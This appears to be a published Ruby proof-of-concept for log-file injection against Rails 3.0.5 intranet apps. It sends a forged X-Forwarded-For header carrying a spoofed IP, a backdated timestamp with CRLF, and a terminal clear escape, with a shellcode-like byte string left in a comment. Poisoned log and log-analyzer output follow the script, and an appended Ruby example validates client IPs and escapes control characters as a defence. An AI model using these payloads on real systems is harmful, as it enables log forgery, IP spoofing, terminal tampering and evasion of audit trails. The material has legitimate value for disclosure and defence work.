Created
March 13, 2011 17:11
(only on intranet webapps) 3.0.5
#Encoding: UTF-8
#
# Log-File-Injection - Ruby on Rails 3.0.5
# possibilities:
# - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings)
# - ip spoofing
# - terminal injection
# - binary log-injections
# - DOS if ip is used with an iptables-ban-script
#
# !! works only on intranet apps !!
#
# Fix:
# validate request.remote_ip until they fix it
# -----------------------
# jimmybandit.com
# http://webservsec.blogspot.com
require 'rubygems'
require 'mechanize'
ip = "99.99.99.99 "
clear_code = %x{clear} # terminal "clear screen" escape sequence, captured from the local `clear` binary
payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\x0A" # date back attack incl. ipspoofing (CRLF ends the forged log line)
# payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible
payload = ip + clear_code # clears the terminal if log is watched via tail or cat
a = Mechanize.new
# the hook sets the spoofed X-Forwarded-For header on every request Mechanize sends
a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload }
page = a.get('http://192.168.1.21/people')
# results
=begin
################################
production.log:
################################
Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011
Processing by PeopleController#index as
Rendered people/index.html.erb within layouts/application (24.4ms)
Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms)
################################
request-log-analyzer:
################################
web@debian:~/testapp/log$ request-log-analyzer production.log
Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0
Website: http://railsdoctors.com
production.log: 100% [==========] Time: 00:00:00
Request summary
━━━━━━━━━━━━━━━━━━━━━━━
Parsed lines: 14
Skipped lines: 0 <-------
Parsed requests: 7 <-------
Skipped requests: 0
Warnings: teaser_check_failed: 7
First request: 2009-01-01 00:00:12
Last request: 2009-01-01 00:00:12
Total time analyzed: 0 days
Request distribution per hour
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
0:00 ┃ 7 hits/day ┃ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
1:00 ┃ 0 hits/day ┃
...
=end
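The "Fix" note above says to validate request.remote_ip. The following is an added example, not code from the gist, of the check an app can apply before it trusts or logs a client address taken from X-Forwarded-For: only a bare IP literal is accepted, everything else falls back to the socket peer, and any free-form value is made log-safe. Function names and the sample values are assumptions made for the example.

```ruby
require 'ipaddr'

# Returns the client address to log: the first candidate in X-Forwarded-For
# (comma-separated, left to right) that is a bare IPv4/IPv6 literal, falling
# back to the socket peer address. Spoofed timestamps, CRLF and terminal
# escape sequences therefore never reach the log line.
def trusted_client_ip(forwarded_for, remote_addr)
  candidates = forwarded_for.to_s.split(',').map(&:strip)
  valid = candidates.find do |c|
    # cheap syntactic gate: rejects spaces, "/", ESC and anything non-hex
    next false unless c.match?(/\A[0-9a-fA-F.:]+\z/)
    begin
      IPAddr.new(c) # still raises on malformed literals such as "..."
      true
    rescue IPAddr::InvalidAddressError, ArgumentError
      false
    end
  end
  valid || remote_addr
end

# Defence in depth for any request-controlled value that ends up in a log:
# control characters (CR, LF, ESC, NUL, ...) are rewritten as visible \xNN
# escapes, so one request cannot forge extra entries or drive the terminal
# of whoever tails the file.
def log_safe(value)
  value.to_s.gsub(/[\x00-\x1f\x7f]/) { |c| format('\\x%02X', c.ord) }
end

if __FILE__ == $PROGRAM_NAME
  # constructed header values mirroring the payloads discussed in the gist
  spoofed_date = "99.99.99.99 at Mon Jan 01 00:00:00 +1000 2009\r\n"
  spoofed_term = "99.99.99.99\e[H\e[2J"
  peer = '192.168.1.50'
  puts "Started GET \"/people\" for #{trusted_client_ip(spoofed_date, peer)}"
  puts "Started GET \"/people\" for #{trusted_client_ip(spoofed_term, peer)}"
  puts "raw header: #{log_safe(spoofed_term)}"
end
```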